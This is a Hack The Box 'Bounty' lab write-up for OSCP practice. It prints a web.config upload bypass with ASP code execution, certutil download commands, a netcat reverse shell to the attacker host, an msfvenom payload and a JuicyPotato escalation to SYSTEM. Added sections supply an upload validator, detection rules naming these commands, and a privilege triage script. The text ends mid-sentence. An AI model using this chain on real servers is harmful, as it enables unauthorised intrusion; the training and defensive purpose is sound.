In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
```text
# Nmap 7.94 scan initiated Sat Oct 21 00:25:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/bounty/results/10.10.10.93/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/bounty/results/10.10.10.93/scans/xml/_quick_tcp_nmap.xml 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-21 00:25:53 EDT for 34s
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 21 00:26:27 2023 -- 1 IP address (1 host up) scanned in 41.48 seconds
```
Checking the webpage, we find a file upload at 10.10.10.93/transfer.aspx.
Tried uploading arbitrary files, but it looks like only jpg or gif are accepted; tested with a jpeg.
Found that we can upload a web.config instead, which IIS reads as configuration for the upload directory and which the filter does not block.
PoC for this:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```
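Why the upload filter let this through, and what a stricter check looks like. The following is an added example, not code from the write-up or from the Bounty application: it models the weak filter as a blocklist of script extensions (an assumption; the write-up only reports that jpg/gif pass and that a .config passes too) and places it next to a check that allow-lists extensions, rejects reserved IIS names and double extensions, and verifies the content's magic bytes. All file names and bytes are constructed.

```python
"""
Added example (not from the Bounty write-up or the target application):
the kind of filter that lets web.config through next to a stricter check.
The weak filter is modelled as a blocklist of script extensions, which is
an assumption; file names and bytes below are constructed.
"""
import os
import secrets

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".gif"}

# Leading bytes of the image formats the upload form says it accepts.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Files IIS/ASP.NET interprets if they land in a served directory. A
# web.config redefines handler mappings for that directory, which is what
# the PoC above relies on; it is not a script by extension, so it passes.
RESERVED_NAMES = {"web.config", "global.asax"}

# Assumed blocklist used by the weak filter.
BLOCKED_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".dll", ".bat", ".ps1"}


def weak_check(filename: str) -> bool:
    """Extension blocklist only: .config is not on it and content is never read."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTENSIONS


def strict_check(filename: str, data: bytes) -> tuple:
    """Allow-list the extension, reject reserved names and double extensions,
    and require the content to start with the declared format's magic bytes.
    Returns (accepted, reason)."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    if name in RESERVED_NAMES or name.endswith(".config"):
        return False, "reserved IIS configuration name"
    if name.startswith(".") or name.count(".") != 1:
        return False, "exactly one extension required"
    ext = os.path.splitext(name)[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext} not allowed"
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen file name, so the client-supplied name never reaches disk."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for fname, blob in [("cat.jpg", b"\xff\xd8\xff\xe0"), ("web.config", b"<?xml"), ("cat.gif", b"<?xml")]:
        print(fname, "weak:", weak_check(fname), "strict:", strict_check(fname, blob))
```

The validator is only the first layer. The directory that receives uploads should not be served with script handlers at all, the relevant IIS configuration sections should be locked at the server level so a per-directory web.config cannot override them, and files should be written under a name the server chooses (as `storage_name` does), which together remove the upload-a-config path the PoC uses even if a future filter change lets another extension through.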
Putting in a command to download netcat and then run a reverse shell with it, as two separate web.config uploads:
`Set cmd1 = wShell1.Exec("certutil.exe -urlcache -f -split http://10.10.14.4:90/nc.exe C:\users\public\Documents\nc.exe")`
and
`Set cmd1 = wShell1.Exec("cmd /c C:\Users\Public\Documents\nc.exe -e cmd 10.10.14.4 443")`
The ASP section at the end of the web.config (the HTML comment after `</configuration>`) becomes, for the download step:

```asp
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("certutil.exe -urlcache -f -split http://10.10.14.4:90/nc.exe C:\users\public\Documents\nc.exe")
Response.write(cmd1.StdOut.ReadAll())
%>
-->
```

and, for the reverse shell step (the original had `cmd2` in the last line, which is never assigned; it is `cmd1`):

```asp
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c C:\Users\Public\Documents\nc.exe -e cmd 10.10.14.4 443")
Response.write(cmd1.StdOut.ReadAll())
%>
-->
```
Set up a listener, then upload the second web.config and request it.
We get a shell:

```text
╭─kali@kali ~/HTB/bounty
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.93] 49172
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
```
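From the defender's side, the chain that just ran leaves a distinctive process tree: the IIS worker process (w3wp.exe) spawning certutil with a URL, then cmd and netcat with `-e`. The following is an added detection example, not part of the write-up: a small rule pass over process-creation events. The events are constructed in a simplified Sysmon-like `key=value|key=value` form (the field names ParentImage, Image and CommandLine mirror Sysmon's Event ID 1, the layout is mine), the rule names are mine, and 192.0.2.10 is a documentation address standing in for the attacker host.

```python
"""
Added detection example, not part of the Bounty write-up: a rule pass over
process-creation events for the chain just demonstrated (IIS worker process
w3wp.exe launching certutil as a downloader, then netcat with -e). The events
are constructed in a simplified Sysmon-like "key=value|key=value" form, and
192.0.2.10 is a documentation address standing in for the attacker host.
"""
import re

SAMPLE_EVENTS = [
    # The two commands the web.config variants above execute, as w3wp children.
    r"ParentImage=C:\Windows\System32\inetsrv\w3wp.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil.exe -urlcache -f -split http://192.0.2.10:90/nc.exe C:\Users\Public\Documents\nc.exe",
    r"ParentImage=C:\Windows\System32\inetsrv\w3wp.exe|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd /c C:\Users\Public\Documents\nc.exe -e cmd 192.0.2.10 443",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Users\Public\Documents\nc.exe"
    r"|CommandLine=C:\Users\Public\Documents\nc.exe -e cmd 192.0.2.10 443",
    # Benign activity that should not fire.
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe"
    r"|CommandLine=notepad.exe C:\Users\alice\notes.txt",
    r"ParentImage=C:\Windows\System32\svchost.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil.exe -verify C:\certs\server.cer",
]

# Processes that should not normally be children of the IIS worker process.
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe",
                      "cscript.exe", "wscript.exe", "mshta.exe"}


def parse_event(line: str) -> dict:
    """Split 'k=v|k=v' into a dict; only the first '=' of a field separates key and value."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def web_worker_spawned_shell(e: dict) -> bool:
    return (image_name(e.get("ParentImage", "")) == "w3wp.exe"
            and image_name(e.get("Image", "")) in SHELLS_AND_LOLBINS)


def certutil_download(e: dict) -> bool:
    cmd = e.get("CommandLine", "")
    return (image_name(e.get("Image", "")) == "certutil.exe"
            and re.search(r"-urlcache", cmd, re.I) is not None
            and re.search(r"https?://", cmd, re.I) is not None)


def netcat_exec_shell(e: dict) -> bool:
    # nc/nc64 invoked with -e, i.e. a program bound to the connection.
    return re.search(r"\bnc(?:64)?\.exe\b.*\s-e\s", e.get("CommandLine", ""), re.I) is not None


RULES = [
    ("web_worker_spawned_shell", web_worker_spawned_shell),
    ("certutil_download", certutil_download),
    ("netcat_exec_shell", netcat_exec_shell),
]


def scan(lines: list) -> list:
    """Return (rule_name, event_index) for every rule that fires on every event."""
    hits = []
    for idx, line in enumerate(lines):
        event = parse_event(line)
        for name, rule in RULES:
            if rule(event):
                hits.append((name, idx))
    return hits


if __name__ == "__main__":
    for name, idx in scan(SAMPLE_EVENTS):
        print(f"{name:26} event {idx}: {parse_event(SAMPLE_EVENTS[idx])['CommandLine']}")
```

The parent-process rule is the one that generalises: neither `certutil` nor `nc` needs to appear for a web-server worker spawning `cmd.exe` to be worth an alert, and the two command-line rules then tell the analyst which stage of the chain they are looking at.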
Checking system info:

```text
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 10/22/2023, 3:55:54 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,635 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,656 MB
Virtual Memory: In Use: 439 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
```
Checking whoami:

```text
c:\windows\system32\inetsrv>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>
```
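Triaging the output above the way a hardening review would: the following is an added example, not from the write-up, that parses the fixed-width table `whoami /priv` prints and flags privileges Microsoft documents as sensitive, including the SeImpersonatePrivilege this write-up goes on to use. The sample output is constructed to match the write-up's result for the application pool identity (with whoami's real column spacing, which the copy above has lost); the list of sensitive privileges and their one-line descriptions are mine.

```python
"""
Added triage example, not part of the Bounty write-up: parse the fixed-width
PRIVILEGES INFORMATION table from `whoami /priv` and flag privileges that
warrant review. The sample is constructed to match the write-up's result.
"""
import re

# Constructed sample in whoami's fixed-width layout: the '=' ruler line
# defines the column boundaries, which is what the parser relies on.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges commonly listed as sensitive. The descriptions are this
# example's own summaries. A "Disabled" state only means the token is not
# currently using the privilege; a process holding it can enable it, so
# state is reported but does not clear the finding.
SENSITIVE = {
    "SeImpersonatePrivilege": "impersonate clients; the privilege Juicy Potato relies on in this write-up",
    "SeAssignPrimaryTokenPrivilege": "replace a process token; reviewed alongside impersonation",
    "SeDebugPrivilege": "read and attach to any process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}


def parse_whoami_priv(text: str) -> list:
    """Return one dict (name, description, state) per privilege row.
    Columns are sliced by the '=' ruler so descriptions with spaces survive."""
    lines = text.splitlines()
    ruler = next((i for i, l in enumerate(lines)
                  if "=" in l and re.fullmatch(r"[= ]+", l)), None)
    if ruler is None:
        return []
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[ruler])]
    rows = []
    for line in lines[ruler + 1:]:
        if not line.strip():
            continue
        cells = []
        for i, (start, end) in enumerate(spans):
            stop = end if i < len(spans) - 1 else len(line)   # last column runs to end of line
            cells.append(line[start:stop].strip())
        rows.append(dict(zip(("name", "description", "state"), cells)))
    return rows


def find_sensitive(text: str) -> list:
    """(privilege, state) for every sensitive privilege present in the token."""
    return [(r["name"], r["state"]) for r in parse_whoami_priv(text) if r["name"] in SENSITIVE]


if __name__ == "__main__":
    for name, state in find_sensitive(SAMPLE_WHOAMI_PRIV):
        print(f"{name:30} {state:9} {SENSITIVE[name]}")
```

IIS application pool identities hold SeImpersonatePrivilege by default, so on its own the finding is expected; what the review should record is the combination seen on this host: a web application that lets an attacker run code as that identity, and an operating system old enough that the DCOM-based impersonation technique still works.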
Looks like a candidate for Juicy Potato, since SeImpersonatePrivilege is enabled.
Serve JuicyPotato and a reverse shell payload.
Shell:

```text
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 -a x64 --platform windows LPORT=444 EXITFUNC=thread -f exe -o shell.exe 2 ↵
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
```
Got both files onto the machine:

```text
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
```
Set up a listener on 444 and run Juicy
```text
c:\Users\Public\Downloads>JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 444
JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 444
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
c:\Users\Public\Downloads>
```
We have admin (NT AUTHORITY\SYSTEM):

```text
╰─$ nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.93] 49185
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
```
We can't get into any directory from this shell, so we'll move into a new shell with netcat:

```text
╰─$ cd ../
╭─kali@kali ~/HTB/buff
╰─$ cp ~/exe/nc64.exe ./
╭─kali@kali ~/HTB/buff
╰─$ mv nc64.exe nc.exe
╭─kali@kali ~/HTB/buff
╰─$ serve 90
Starting HTTP server on port 90...
====================================
certutil -urlcache -f http://10.10.14.4:90/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.4:90/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 90 (http://0.0.0.0:90/) ...
```
and